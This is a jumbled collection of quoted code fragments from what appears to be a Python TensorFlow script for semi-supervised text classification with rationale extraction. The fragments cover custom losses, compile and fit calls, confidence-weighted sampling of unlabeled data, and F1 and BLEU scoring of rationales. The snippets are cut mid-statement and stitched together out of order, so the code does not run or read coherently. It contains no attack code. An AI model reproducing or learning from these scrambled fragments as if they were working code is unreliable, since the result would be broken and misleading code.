y_neg_test], verbose=0) elif", "= tf.keras.callbacks.LearningRateScheduler(lr_scheduler, verbose=1) return learning_rate_scheduler def train_model(max_seq_length, X, y, X_test, y_test, X_unlabeled, model_dir,", "'rationale_classifier':[tf.keras.metrics.SparseCategoricalAccuracy(name=\"acc\")], 'rationale_task_classifier':[tf.keras.metrics.SparseCategoricalAccuracy(name=\"acc\")], 'l2_distance':None}) #model.compile(optimizer=tf.keras.optimizers.Adam(learning_rate=3e-5, epsilon=1e-08), loss={'task_classifier': tf.keras.losses.SparseCategoricalCrossentropy(from_logits=True), 'rationale_classifier': tf.keras.losses.SparseCategoricalCrossentropy(from_logits=True), 'rationale_task_classifier': None, 'l2_distance': custom_loss},", "X_rationale_batch['token_type_ids_r'], X_rationale_batch['attention_mask_r'] model.fit(x=X_batch, y=[y_batch[:,0], y_batch, y_batch[:, 0], 
np.ones(len(y_batch))], shuffle=True, epochs=unsup_epochs, validation_data=(X_dev, [y_dev[:,0], y_dev,", "elif '_no_suffcomp' in type_: loss_weights = [1.0, 1.0, 0, 0] ''' model.compile(optimizer=tf.keras.optimizers.Adam(learning_rate=3e-5, epsilon=1e-08),", "{} : {}\".format(counter, test_acc)) logger.info (\"Best Test task acc for run {} with", "tf.keras.losses.SparseCategoricalCrossentropy(from_logits=True), 'rationale_classifier': tf.keras.losses.SparseCategoricalCrossentropy(from_logits=True), 'rationale_task_classifier': None, 'l2_distance': custom_loss}, metrics=[tf.keras.metrics.SparseCategoricalAccuracy(name=\"acc\"), tf.keras.metrics.SparseCategoricalAccuracy(name=\"acc\"), tf.keras.metrics.SparseCategoricalAccuracy(name=\"acc\"), tf.keras.metrics.Mean(name='mean')]) #X_batch.update(X_rationale_batch) X_batch['input_ids_r'],", "[1.0, 0, 0, 0] elif '_no_suffcomp' in type_: loss_weights = [1.0, 1.0, 0,", "> 0: train_size = int((1. - valid_split)*len(X[\"input_ids\"])) if '_neg' in type_: X_train, y_train", "the base model n times with different initialization to select best base model", "probs = y_val[indices] probs_rat = y_rat[indices] cls = list(acc[indices]) logger.info(cls) X_conf = np.ones((len(y_batch),", ": logger.info(y_train.shape) model.fit(x=X_train, y=[y_train[:,0], y_train[:,1:]], shuffle=True, epochs=sup_epochs, validation_data=(X_dev, [y_dev[:,0], y_dev[:,1:]]), batch_size=sup_batch_size*gpus, callbacks=[tf.keras.callbacks.EarlyStopping(monitor='loss', patience=5,", "if y_test[i][j+1] == 1: temp_t.append(temp[j]) pred_1 += test_pred[i].sum() pred_0+= max_seq_length-pred_1 truth_1 += y_test[i].sum()", "epsilon=1e-08), loss={'task_classifier': tf.keras.losses.SparseCategoricalCrossentropy(from_logits=True), 'rationale_classifier': rat_loss, 'rationale_task_classifier': tf.keras.losses.SparseCategoricalCrossentropy(from_logits=True), 'not_rationale_task_classifier': None}, 
metrics={'task_classifier':[tf.keras.metrics.SparseCategoricalAccuracy(name=\"acc\")], 'rationale_classifier':[tf.keras.metrics.SparseCategoricalAccuracy(name=\"acc\")], 'rationale_task_classifier':[tf.keras.metrics.SparseCategoricalAccuracy(name=\"acc\")], 'not_rationale_task_classifier':None},", "sample_scheme)) model_file_task = os.path.join(model_dir, \"model_task_{}_{}.h5\".format(epoch, sample_scheme)) if os.path.exists(model_file): model.load_weights(model_file) logger.info (\"Model file loaded", "X_batch['token_type_ids_r'], X_batch['attention_mask_r'] = X_rationale_batch['input_ids_r'], X_rationale_batch['token_type_ids_r'], X_rationale_batch['attention_mask_r'] model.fit(x=X_batch, y=[y_batch[:,0], y_batch, y_batch[:, 0], np.ones(len(y_batch))], shuffle=True,", "with strategy.scope(): def custom_loss(y_true, y_pred): cce = tf.keras.losses.SparseCategoricalCrossentropy(from_logits=True, reduction=tf.keras.losses.Reduction.NONE) tf.print(tf.size(y_true), tf.size(y_pred)) cce_loss =", "score (macro/task): {}\".format(precision_recall_fscore_support(class_acc, y_test[:,0], average='macro'))) logger.info(\"Teacher model best score (micro/task): {}\".format(precision_recall_fscore_support(class_acc, y_test[:,0], average='micro')))", "\"token_type_ids\": X_unlabeled_sample['token_type_ids'][indices], \"attention_mask\": X_unlabeled_sample['attention_mask'][indices]} if 'joint' in type_: X_rationale_batch = {\"input_ids_r\": X_sample['input_ids'][indices], \"token_type_ids_r\":", "shuffle from transformers import * import logging import math import models import numpy", "axis=1) logging.info(\"y_batch shape {}\".format(y_batch.shape)) indices = [] for i in labels: indx =", "\"input_ids_r\":X[\"input_ids_r\"][train_size:], \"token_type_ids_r\":X[\"token_type_ids_r\"][train_size:], \"attention_mask_r\":X[\"attention_mask_r\"][train_size:], \"input_ids_neg\":X[\"input_ids_neg\"][train_size:], \"token_type_ids_neg\":X[\"token_type_ids_neg\"][train_size:], 
\"attention_mask_neg\":X[\"attention_mask_neg\"][train_size:]}, y[train_size:] elif 'joint' in type_: X_train, y_train", "model.save_weights(model_file_best) #_student = deepcopy(model) ''' if test_acc > max_test_acc: max_test_acc = test_acc test_task_acc", "X[\"attention_mask\"][train_size:], \"input_ids_r\":X[\"input_ids_r\"][train_size:], \"token_type_ids_r\":X[\"token_type_ids_r\"][train_size:], \"attention_mask_r\":X[\"attention_mask_r\"][train_size:]}, y[train_size:] else: X_train, y_train = {\"input_ids\": X[\"input_ids\"][:train_size], \"token_type_ids\": X[\"token_type_ids\"][:train_size],", "saved to {}\".format(model_file)) best_val_acc = 0. best_test_acc = 0. max_test_acc = 0. max_task_acc", "X_unlabeled_sample['attention_mask'][indices]} if 'joint' in type_: X_rationale_batch = {\"input_ids_r\": X_sample['input_ids'][indices], \"token_type_ids_r\": X_sample['token_type_ids'][indices], \"attention_mask_r\": X_sample['attention_mask'][indices]}", "y_dev[:,1:]], verbose=0)[0] if task_acc > max_task_acc: logger.info (\"Val acc (task) {}\".format(task_acc)) max_task_acc =", "y_pred = model.predict(X_unlabeled_sample, batch_size=256) y_val = np.amax(tf.math.softmax(acc, axis=-1).numpy(), axis=-1) y_rat = np.amax(tf.math.softmax(y_pred, axis=-1).numpy(),", "number of instances sampled from {} unlabeled instances\".format(sample_size, len(X_unlabeled[\"input_ids\"]))) indices = np.random.choice(len(X_unlabeled[\"input_ids\"]), sample_size,", "model.evaluate(X_dev, [y_dev[:,0], y_dev, y_dev[:,0], np.ones(len(y_dev))], verbose=0)[-3] ''' if val_loss < best_loss: best_loss =", "not os.path.exists(model_file): model.save_weights(model_file) logger.info (\"Model file saved to {}\".format(model_file)) model_student = model model_student.load_weights(model_file_best)", "1:], 103) X_negation_sample[\"input_ids\"][:,0] = 101 X_sample[\"input_ids\"][:,0] = 101 logger.info(\"Extracted rationale from teacher model", "y_test.shape)) logger.info (\"X Unlabeled Shape: 
{}\".format(X_unlabeled[\"input_ids\"].shape)) strategy = tf.distribute.MirroredStrategy() gpus = strategy.num_replicas_in_sync logger.info('Number", "Config, pt_teacher_checkpoint, max_seq_length, len(labels), dense_dropout=dense_dropout, attention_probs_dropout_prob=attention_probs_dropout_prob, hidden_dropout_prob=hidden_dropout_prob) model.compile(optimizer=tf.keras.optimizers.Adam(learning_rate=3e-5, epsilon=1e-08), loss=[tf.keras.losses.SparseCategoricalCrossentropy(from_logits=True), rat_loss], metrics=[tf.keras.metrics.SparseCategoricalAccuracy(name=\"dense_3_classification_acc\")])#, tf.keras.metrics.SparseCategoricalAccuracy(name=\"token_acc\")])", "model.fit(x=X_batch, y=[y_batch[:,0], y_batch, y_batch[:, 0], np.ones(len(y_batch))], shuffle=True, epochs=unsup_epochs, validation_data=(X_dev, [y_dev[:,0], y_dev, y_dev[:,0], np.ones(len(y_dev))]),", "verbose=0)[-3] out1 = model.predict(X_test) acc1, y_pred1, r_acc1 = out1[0], out1[1], out1[2] y_pred1 =", "model.fit(x=X_batch, y=[y_batch[:,0], y_batch[:,1:]], shuffle=True, epochs=unsup_epochs, validation_data=(X_dev, [y_dev[:,0], y_dev[:,1:]]), batch_size=unsup_batch_size*gpus, callbacks=[tf.keras.callbacks.EarlyStopping(monitor='dense_3_classification_acc', patience=5, restore_best_weights=True)], sample_weight=[X_conf[:,0],", "+=ct fn += (y_test[i].sum()-ct) p = tp/(tp+fp+0.0000001) r = tp/(tp+fn+0.0000001) logger.info(\"Token-level: {}\".format((tp)/(tp+(0.5*(fp+fn))))) logger.info(\"Rationale", "verbose=0)[-2] elif 'joint_neg' in type_: y_neg_dev = np.full((len(y_dev), len(labels)), 1/len(labels)) y_neg_test = np.full((len(y_test),", "average='micro'))) logger.info(\"Token Predictions shape {}\".format(test_pred.shape)) pred, truth = [], [] logger.info(test_pred) test_pred =", "from sklearn.utils import shuffle from transformers import * import logging import math import", "\"attention_mask\": X[\"attention_mask\"][:train_size], \"input_ids_r\":X[\"input_ids_r\"][:train_size], 
\"token_type_ids_r\":X[\"token_type_ids_r\"][:train_size], \"attention_mask_r\":X[\"attention_mask_r\"][:train_size], \"input_ids_neg\":X[\"input_ids_neg\"][:train_size], \"token_type_ids_neg\":X[\"token_type_ids_neg\"][:train_size], \"attention_mask_neg\":X[\"attention_mask_neg\"][:train_size]}, y[:train_size] X_dev, y_dev = {\"input_ids\":", "logger.info(\"BLEU-3 score of rationales on test set (student model): {} \".format(score3/len(pred))) logger.info(\"BLEU-4 score", "pt_teacher_checkpoint, max_seq_length, len(labels), dense_dropout=dense_dropout, attention_probs_dropout_prob=attention_probs_dropout_prob, hidden_dropout_prob=hidden_dropout_prob) model.compile(optimizer=tf.keras.optimizers.Adam(learning_rate=3e-5, epsilon=1e-08), loss={'task_classifier': tf.keras.losses.SparseCategoricalCrossentropy(from_logits=True), 'rationale_classifier':tf.keras.losses.SparseCategoricalCrossentropy(from_logits=True), 'rationale_task_classifier': None,", "acc, y_pred = model.predict(X_unlabeled_sample, batch_size=256) y_val = np.amax(tf.math.softmax(acc, axis=-1).numpy(), axis=-1) y_rat = np.amax(tf.math.softmax(y_pred,", "os.path.join(model_dir, \"model_token_{}_{}.h5\".format(epoch, sample_scheme)) model_file_task = os.path.join(model_dir, \"model_task_{}_{}.h5\".format(epoch, sample_scheme)) if os.path.exists(model_file): model.load_weights(model_file) logger.info (\"Model", "(\"Class labels {}\".format(labels)) #split X and y to train and dev with valid_split", "None}, loss_weights=loss_weights) if counter == 0: logger.info(model.summary()) model_file = os.path.join(model_dir, \"model_label.h5\") model_file_task =", "None if '_noexp' in type_: loss_weights = [1.0, 0.0] else: loss_weights = [0.5,", "{}\".format(p)) logger.info(\"Token overlap: {}\".format(tp/(tp+fp+fn))) score1, score2, score3, score4 = 0.0, 0.0, 0.0, 0.0", "of rationales on test set (teacher model): {} \".format(score1/len(pred))) logger.info(\"BLEU-2 score of rationales", "dev with valid_split if 
valid_split > 0: train_size = int((1. - valid_split)*len(X[\"input_ids\"])) if", "logger.info(\"Printing prediction data on teacher model for run {}: {}\".format(counter, test_pred)) tp, fn,", "logger.info(\"X Train Shape: {} {}\".format(X_train[\"input_ids\"].shape, y_train.shape)) logger.info(\"X Dev Shape: {} {}\".format(X_dev[\"input_ids\"].shape, y_dev.shape)) logger.info(\"X", "unsup_size, len(labels), y_T=y_T, type_=type_) probs = y_val[indices] probs_rat = y_rat[indices] cls = list(acc[indices])", "negation_mask[:,0] = 1 X_sample = {\"input_ids\": np.array(X_unlabeled_sample[\"input_ids\"]), \"token_type_ids\": np.array(X_unlabeled_sample['token_type_ids']), \"attention_mask\": attention_mask_r} #mask tokens", "epsilon=1e-08), loss={'task_classifier': tf.keras.losses.SparseCategoricalCrossentropy(from_logits=True), 'rationale_classifier':rat_loss, 'rationale_task_classifier': None, 'not_rationale_task_classifier': None}, metrics={'task_classifier':[tf.keras.metrics.SparseCategoricalAccuracy(name=\"acc\")], 'rationale_classifier':[tf.keras.metrics.SparseCategoricalAccuracy(name=\"acc\")], 'rationale_task_classifier':[tf.keras.metrics.SparseCategoricalAccuracy(name=\"acc\")], 'not_rationale_task_classifier': None},", "callbacks=[tf.keras.callbacks.EarlyStopping(monitor='val_task_classifier_acc', patience=5, restore_best_weights=True)]) # class_weight=class_weight) tf.keras.backend.clear_session() if not os.path.exists(model_file): model.save_weights(model_file) logger.info (\"Model file", "acc for run {} : {}\".format(counter, test_acc)) logger.info (\"Best Test task acc for", "'joint' in type_: out = model.evaluate(X_test, [y_test[:,0], y_test, y_test[:,0], np.ones(len(y_test))]) task_acc, test_acc, r_acc", "'rationale_classifier': custom_loss, 'rationale_task_classifier': tf.keras.losses.SparseCategoricalCrossentropy(from_logits=True), 'not_rationale_task_classifier': custom_loss_neg}, 
metrics={'task_classifier':[tf.keras.metrics.SparseCategoricalAccuracy(name=\"acc\")], 'rationale_classifier':[tf.keras.metrics.SparseCategoricalAccuracy(name=\"acc\")], 'rationale_task_classifier':[tf.keras.metrics.SparseCategoricalAccuracy(name=\"acc\")], 'not_rationale_task_classifier':None}, loss_weights=loss_weights) X_batch['input_ids_r'], X_batch['token_type_ids_r'],", "max_test_acc: max_test_acc = test_acc test_task_acc = model.evaluate(X_test, [y_test[:,0], y_test[:,1:], y_test[:,0], np.ones(len(y_test))], verbose=0)[-3] if", "= model.evaluate(X_test, [y_test[:,0], y_test[:,1:], y_test[:,0], np.ones(len(y_test))], verbose=0) elif 'mtl' in type_: temp =", "y_pred[indices] else: X_unlabeled_sample, y_pred = {'input_ids': X_unlabeled[\"input_ids\"][indices], 'token_type_ids': X_unlabeled[\"token_type_ids\"][indices], 'attention_mask': X_unlabeled[\"attention_mask\"][indices]}, y_pred[indices] else:", "y_pred, r_acc = y_train[:,0], y_train[:,1:], y_train[:,0] y_val = acc y_rat = np.array(y_pred).astype('float') #y_rat", "X_dev, y_dev = {\"input_ids\": X[\"input_ids\"][train_size:], \"token_type_ids\": X[\"token_type_ids\"][train_size:], \"attention_mask\": X[\"attention_mask\"][train_size:], \"input_ids_r\":X[\"input_ids_r\"][train_size:], \"token_type_ids_r\":X[\"token_type_ids_r\"][train_size:], \"attention_mask_r\":X[\"attention_mask_r\"][train_size:]}, y[train_size:]", "test_acc = model.evaluate(X_test, [y_test[:,0], y_test[:,1:]], verbose=0)[4] task_acc = model.evaluate(X_test, [y_test[:,0], y_test[:,1:]], verbose=0)[3] val_loss", "= np.where(y_pred[i]==0, X_negation_sample[\"input_ids\"][i, 1:], 103) X_negation_sample[\"input_ids\"][:,0] = 101 X_sample[\"input_ids\"][:,0] = 101 logger.info(\"Extracted rationale", "(macro/task): {}\".format(precision_recall_fscore_support(acc1, y_test[:,0], average='macro'))) val_loss = model.evaluate(X_dev, [y_dev[:,0], y_dev[:,1:], y_dev[:,0], y_neg_dev], verbose=0)[0] if", "== 1: #to skip evaluation of the task label 
temp_t.append(temp[j]) pred_1 += test_pred[i].sum()", "import math import models import numpy as np import os, sys import json", "text = tokenizer.decode(X_test[\"input_ids\"][i]) temp = dict() temp['text'] = text temp['truth'] = truth[i] temp['pred']", "class_acc = np.argmax(class_acc, axis=-1) elif 'joint' in type_: out = model.predict(X_test) class_acc, test_pred,", "max_seq_length-pred_1 truth_1 += y_test[i].sum() truth_0+= max_seq_length-truth_1 pred.append(' '.join(temp_p)) truth.append(' '.join(temp_t)) for word in", "type_): X_sample = {\"input_ids\": X_sample['input_ids'][indices], \"token_type_ids\": X_sample['token_type_ids'][indices], \"attention_mask\": X_sample['attention_mask'][indices]} ''' #acc = acc[:,None]", "model_student.predict(X_test) acc, y_pred, r_acc = out[0], out[1], out[2] logger.info(\"Raw logits: {}\".format(acc)) y_pred =", "'_neg' in type_: y_neg_dev = np.full((len(y_dev), len(labels)), 1/len(labels)) y_neg_test = np.full((len(y_test), len(labels)), 1/len(labels))", "'attention_mask_r':X_unlabeled['attention_mask_r'][indices]}, y_pred[indices] else: X_unlabeled_sample, y_pred = {'input_ids': X_unlabeled[\"input_ids\"][indices], 'token_type_ids': X_unlabeled[\"token_type_ids\"][indices], 'attention_mask': X_unlabeled[\"attention_mask\"][indices]}, y_pred[indices]", "Train Shape: {} {}\".format(X_train[\"input_ids\"].shape, y_train.shape)) logger.info(\"X Dev Shape: {} {}\".format(X_dev[\"input_ids\"].shape, y_dev.shape)) logger.info(\"X Test", "'joint' in type_: acc = acc[:,None] y_batch = np.concatenate((acc[indices], y_pred[indices][:, 1:]), axis=1) logger.info(\"y_batch", "temp_p.append(temp[j]) if y_test[i][j+1] == 1: #to skip evaluation of the task label temp_t.append(temp[j])", "X_sample[\"input_ids\"][:,0] = 101 logger.info(\"Extracted rationale from teacher model as input for task: {}\".format(X_sample[\"input_ids\"][:5]))", "for run {} with total loss : {}\".format(counter, task_acc)) if 'mtl' in type_:", "acc = acc[:,None] 
y_batch = np.concatenate((acc, y_pred), axis=1) logging.info(\"y_batch shape {}\".format(y_batch.shape)) indices =", "np.array(X_unlabeled_sample[\"input_ids\"]), \"token_type_ids\": np.array(X_unlabeled_sample['token_type_ids']), \"attention_mask\": negation_mask} for i in range(len(y_pred)): X_sample[\"input_ids\"][i, 1:] = np.where(y_pred[i]==0,", "elif 'joint' in type_: _placeholder_labels = np.empty((y_train.shape[0], y_train.shape[0])) model.fit(x=X_train, y=[y_train[:,0], y_train, y_train[:,0], np.ones(len(y_train))],", "= out[0], out[1], out[2] logger.info(\"Raw logits: {}\".format(acc)) y_pred = np.argmax(y_pred, axis=-1) acc =", "acc = np.argmax(acc, axis=-1) r_acc = np.argmax(r_acc, axis=-1) logger.info(\"Best task acc score: {}\".format(precision_recall_fscore_support(acc,", "1/len(labels))] y_test_plg = [y_test[:,1:], y_test[:,0], np.full((len(y_test),len(labels)), 1/len(labels))] test_acc = model.evaluate(X_dev, [y_dev[:,0], y_dev[:,1:], y_dev[:,0],", "val_loss = model.evaluate(X_dev, [y_dev[:,0], y_dev[:,1:], y_dev[:,0], np.full((len(y_dev), len(labels)), 1/len(labels))]) elif 'joint' in type_:", "in type_: rat_loss = SparseCategoricalFocalLoss(gamma=2) else: rat_loss = tf.keras.losses.SparseCategoricalCrossentropy(from_logits=True) loss_weights = None if", "acc for run {} with total loss : {}\".format(counter, task_acc)) if 'mtl' in", "\"attention_mask\": X_sample['attention_mask'][indices]} ''' #acc = acc[:,None] #y_batch = np.concatenate((acc[indices], y_pred), axis=1) acc =", "score of rationales on test set (student model): {} \".format(score2/len(pred))) logger.info(\"BLEU-3 score of", "train and dev with valid_split if valid_split > 0: train_size = int((1. 
-", "tf.keras.losses.SparseCategoricalCrossentropy(from_logits=True), 'not_rationale_task_classifier': None}, metrics={'task_classifier':[tf.keras.metrics.SparseCategoricalAccuracy(name=\"acc\")], 'rationale_classifier':[tf.keras.metrics.SparseCategoricalAccuracy(name=\"acc\")], 'rationale_task_classifier':[tf.keras.metrics.SparseCategoricalAccuracy(name=\"acc\")], 'not_rationale_task_classifier':None}, loss_weights=loss_weights) y_neg = np.full((len(y_train),len(labels)), 1/len(labels)) model.fit(x=X_train,", "np.argmax(y_pred, axis=-1) #.flatten() acc = np.argmax(acc, axis=-1) r_acc = np.argmax(r_acc, axis=-1) #compute confidence", "truth = [], [] #sys.exit(1) test_pred = y_pred #np.argmax(y_pred, axis=-1) logger.info(\"Printing prediction data", "elif 'joint_neg' in type_: logger.info(\"Training for without rationales\") with strategy.scope(): def custom_loss(y_true, y_pred):", "rat_loss = SparseCategoricalFocalLoss(gamma=2) else: rat_loss = tf.keras.losses.SparseCategoricalCrossentropy(from_logits=True) def custom_loss(y_true, y_pred): cce = tf.keras.losses.SparseCategoricalCrossentropy(from_logits=True,", "tensorflow.keras.backend as kb import tensorflow_addons as tfa from focal_loss import BinaryFocalLoss, SparseCategoricalFocalLoss import", "base is adapted from UST (https://github.com/microsoft/UST) \"\"\" from collections import defaultdict from sklearn.utils", "Config, pt_teacher_checkpoint, max_seq_length, len(labels), dense_dropout=dense_dropout, attention_probs_dropout_prob=attention_probs_dropout_prob, hidden_dropout_prob=hidden_dropout_prob) model.compile(optimizer=tf.keras.optimizers.Adam(learning_rate=3e-5, epsilon=1e-08), loss={'task_classifier': tf.keras.losses.SparseCategoricalCrossentropy(from_logits=True), 'rationale_classifier':tf.keras.losses.SparseCategoricalCrossentropy(from_logits=True), 'rationale_task_classifier':", "'rationale_task_classifier': tf.keras.losses.SparseCategoricalCrossentropy(from_logits=True), 
'not_rationale_task_classifier': None}, metrics={'task_classifier':[tf.keras.metrics.SparseCategoricalAccuracy(name=\"acc\")], 'rationale_classifier':[tf.keras.metrics.SparseCategoricalAccuracy(name=\"acc\")], 'rationale_task_classifier':[tf.keras.metrics.SparseCategoricalAccuracy(name=\"acc\")], 'not_rationale_task_classifier':None}, loss_weights=loss_weights) y_neg = np.full((len(y_train),len(labels)), 1/len(labels))", "= pred[i] temp['score'] = nltk.translate.bleu_score.sentence_bleu([truth[i].split()],pred[i].split()) data.append(temp) with open(os.path.join(model_dir, 'rationale_output_test_'+type_+'.json'), 'w') as f: json.dump(data,", "math import models import numpy as np import os, sys import json import", "in range(len(y_pred)): X_sample[\"input_ids\"][i, 1:] = np.where(y_pred[i]==0, 103, X_sample[\"input_ids\"][i, 1:]) if '_neg' in type_:", "len(labels)), 1/len(labels))]) elif 'joint' in type_: _placeholder_labels = np.empty((y_train.shape[0], y_train.shape[0])) model.fit(x=X_train, y=[y_train[:,0], y_train,", "= model.evaluate(X_test, [y_test[:,0], y_test[:,1:], y_test[:,0], np.ones(len(y_test))], verbose=0)[-3] if '_neg' in type_: y_neg_dev =", "best_validation_loss = val_loss[0] model = best_base_model ''' if 'mtl' in type_: logger.info (\"Best", "task acc for run {} with total loss : {}\".format(counter, task_acc)) if 'mtl'", "= np.argmax(acc, axis=-1) r_acc = np.argmax(r_acc, axis=-1) #compute confidence on the unlabeled set", "int(os.getenv(\"PYTHONHASHSEED\")) random.Random(GLOBAL_SEED).shuffle(indx) if len(indx) > unsup_size: indx = indx[:unsup_size] logger.info(\"Shape of predicted labels", "= SparseCategoricalFocalLoss(gamma=2) else: rat_loss = tf.keras.losses.SparseCategoricalCrossentropy(from_logits=True) with strategy.scope(): loss_weights = [1.0, 1.0, 1.0,", "X_sample['input_ids'][indices], \"token_type_ids_r\": X_sample['token_type_ids'][indices], \"attention_mask_r\": X_sample['attention_mask'][indices]} if '_neg' in type_: 
X_neg_rationale_batch = {\"input_ids_neg\": X_negation_sample['input_ids'][indices],", "len(labels)), 1/len(labels)) y_neg_test = np.full((len(y_test), len(labels)), 1/len(labels)) temp = model.evaluate(X_test, [y_test[:,0], y_test[:,1:], y_test[:,0],", "{}\".format(counter, test_pred)) tp, fn, fp = 0, 0, 0 pred_1, pred_0, truth_1, truth_0", "sample_size, replace=False) if '_neg' in type_: X_unlabeled_sample, y_pred = {'input_ids': X_unlabeled[\"input_ids\"][indices], 'token_type_ids': X_unlabeled[\"token_type_ids\"][indices],", "not os.path.exists(model_file): model.save_weights(model_file) logger.info (\"Model file saved to {}\".format(model_file)) best_val_acc = 0. best_test_acc", "y_dev, y_dev[:,0], y_neg_dev], verbose=0)[-3] if test_acc > max_test_acc: max_test_acc = test_acc test_task_acc =", "nltk import tensorflow as tf import tensorflow.keras as K import tensorflow.keras.backend as kb", "'rationale_classifier': rat_loss, 'rationale_task_classifier': tf.keras.losses.SparseCategoricalCrossentropy(from_logits=True), 'not_rationale_task_classifier': None}, metrics={'task_classifier':[tf.keras.metrics.SparseCategoricalAccuracy(name=\"acc\")], 'rationale_classifier':[tf.keras.metrics.SparseCategoricalAccuracy(name=\"acc\")], 'rationale_task_classifier':[tf.keras.metrics.SparseCategoricalAccuracy(name=\"acc\")], 'not_rationale_task_classifier':None}, loss_weights=loss_weights) y_neg =", "nltk.translate.bleu_score.sentence_bleu([truth[i].split()],pred[i].split(), weights=(0, 0, 0, 1)) logger.info(\"BLEU-1 score of rationales on test set (student", "else: rat_loss = tf.keras.losses.SparseCategoricalCrossentropy(from_logits=True) def custom_loss(y_true, y_pred): cce = tf.keras.losses.SparseCategoricalCrossentropy(from_logits=True, reduction=tf.keras.losses.Reduction.NONE) if 'focal'", "if len(indx) > unsup_size: indx = indx[:unsup_size] logger.info(\"Shape of predicted labels for class", "base model n times with different initialization to select best base model 
based", "'rationale_task_classifier':[tf.keras.metrics.SparseCategoricalAccuracy(name=\"acc\")], 'l2_distance':None}) #model.compile(optimizer=tf.keras.optimizers.Adam(learning_rate=3e-5, epsilon=1e-08), loss={'task_classifier': tf.keras.losses.SparseCategoricalCrossentropy(from_logits=True), 'rationale_classifier': tf.keras.losses.SparseCategoricalCrossentropy(from_logits=True), 'rationale_task_classifier': None, 'l2_distance': custom_loss}, metrics=[tf.keras.metrics.SparseCategoricalAccuracy(name=\"acc\"),", "coh_loss = tf.reduce_mean(tf.reduce_sum(tf.math.abs(y_pred[1:]-y_pred[:-1]), axis=0)) #l2_loss = 0.0 #logger.info(l1_loss) return cce_loss + 0.1*l1_loss +", "X_neg_rationale_batch['input_ids_neg'], X_neg_rationale_batch['token_type_ids_neg'], X_neg_rationale_batch['attention_mask_neg'] model.fit(x=X_batch, y=[y_batch[:,0], y_batch[:,1:], y_batch[:, 0], np.full((len(y_batch),len(labels)), 1/len(labels))], shuffle=True, epochs=unsup_epochs, validation_data=(X_dev,", "metrics={'task_classifier':[tf.keras.metrics.SparseCategoricalAccuracy(name=\"acc\")], 'rationale_classifier':[tf.keras.metrics.SparseCategoricalAccuracy(name=\"acc\")], 'rationale_task_classifier':[tf.keras.metrics.SparseCategoricalAccuracy(name=\"acc\")], 'l2_distance': None}) elif 'joint_neg' in type_: rat_loss = None if", "= task_acc best_val_acc = task_acc model.save_weights(model_file_best) #_student = deepcopy(model) val_acc = task_acc #model.evaluate(X_dev,", "strategy.scope(): def custom_loss(y_true, y_pred): cce = tf.keras.losses.SparseCategoricalCrossentropy(from_logits=True, reduction=tf.keras.losses.Reduction.NONE) tf.print(tf.size(y_true), tf.size(y_pred)) cce_loss = ((cce(y_true,", "return learning_rate_scheduler def train_model(max_seq_length, X, y, X_test, y_test, X_unlabeled, model_dir, tokenizer, sup_batch_size=4, unsup_batch_size=32,", "model.evaluate(X_dev, [y_dev[:,0], y_dev, y_dev[:,0], np.ones(len(y_dev))]) logger.info (\"Validation loss for run {} : {}\".format(counter,", 
"tfa from focal_loss import BinaryFocalLoss, SparseCategoricalFocalLoss import random from sklearn.metrics import f1_score from", "fp+=1 tp +=ct fn += (y_test[i].sum()-ct) p = tp/(tp+fp+0.0000001) r = tp/(tp+fn+0.0000001) logger.info(\"Token-level:", "X_unlabeled_sample['token_type_ids'][indices], \"attention_mask\": X_unlabeled_sample['attention_mask'][indices]}, y_batch[indices] if 'joint' in type_: X_rationale_batch = {\"input_ids_r\": X_sample['input_ids'][indices], \"token_type_ids_r\":", "axis=-1) logger.info(\"Model performance for token (macro/task): {}\".format(precision_recall_fscore_support(y_pred1, y_test[:,1:], average='micro'))) logger.info(\"Model performance for token", "axis=-1) #.flatten() acc = np.argmax(acc, axis=-1) r_acc = np.argmax(r_acc, axis=-1) #y_rat = y_rat[:,", "test_acc test_task_acc = model.evaluate(X_test, [y_test[:,0], y_test[:,1:], y_test[:,0], np.ones(len(y_test))], verbose=0)[-3] if '_neg' in type_:", "test set (student model): {} \".format(score2/len(pred))) logger.info(\"BLEU-3 score of rationales on test set", "= nltk.translate.bleu_score.sentence_bleu([truth[i].split()],pred[i].split()) data.append(temp) with open(os.path.join(model_dir, 'rationale_output_test_teacher_'+type_+'.json'), 'w') as f: json.dump(data, f) model_student =", "custom_loss(y_true, y_pred): cce = tf.keras.losses.SparseCategoricalCrossentropy(from_logits=True, reduction=tf.keras.losses.Reduction.NONE) tf.print(tf.size(y_true), tf.size(y_pred)) cce_loss = ((cce(y_true, y_pred))* 1/(unsup_batch_size*gpus))", "y_dev=None, task=None): #labels = [0, 1] #fix hardcoding labels = set(y[:,0]) logger.info (\"Class", "y_pred = model_student.predict(X_test) y_pred = np.argmax(y_pred, axis=-1) acc = np.argmax(acc, axis=-1) #logger.info(\"Micro score", "0.5] with strategy.scope(): model.compile(optimizer=tf.keras.optimizers.Adam(learning_rate=3e-5, epsilon=1e-08), loss=[tf.keras.losses.SparseCategoricalCrossentropy(from_logits=True), rat_loss], 
metrics=[tf.keras.metrics.SparseCategoricalAccuracy(name=\"dense_3_classification_acc\")])#, tf.keras.metrics.SparseCategoricalAccuracy(name=\"token_acc\")]) #, sample_weight_mode=\"temporal\") model.fit(x=X_train, y=[y_train[:,0],", "'mtl' in type_ : logger.info(y_train.shape) model.fit(x=X_train, y=[y_train[:,0], y_train[:,1:]], shuffle=True, epochs=sup_epochs, validation_data=(X_dev, [y_dev[:,0], y_dev[:,1:]]),", "\"token_type_ids\": X_sample['token_type_ids'][indices], \"attention_mask\": X_sample['attention_mask'][indices]} ''' #acc = acc[:,None] #y_batch = np.concatenate((acc[indices], y_pred), axis=1)", "type_: loss_weights = [1.0, 0, 0, 0] if '_no_suffcomp' in type_: loss_weights =", "axis=0) if '_r_' in type_: #re-weight rationales X_conf[:,1:] = np.where(log_rationale>0, log_rationale, 0.000000001) if", "'not_rationale_task_classifier':None}, loss_weights=loss_weights) X_batch['input_ids_r'], X_batch['token_type_ids_r'], X_batch['attention_mask_r'] = X_rationale_batch['input_ids_r'], X_rationale_batch['token_type_ids_r'], X_rationale_batch['attention_mask_r'] X_batch['input_ids_neg'], X_batch['token_type_ids_neg'], X_batch['attention_mask_neg'] =", "overlap: {}\".format(tp/(tp+fp+fn))) score1, score2, score3, score4 = 0.0, 0.0, 0.0, 0.0 for i", "{\"input_ids_r\": X_sample['input_ids'][indices], \"token_type_ids_r\": X_sample['token_type_ids'][indices], \"attention_mask_r\": X_sample['attention_mask'][indices]} if '_neg' in type_: X_neg_rationale_batch = {\"input_ids_neg\":", "{}\".format(X_sample[\"input_ids\"][:5])) logger.info(\"Extracted rationale from teacher model as input for task: 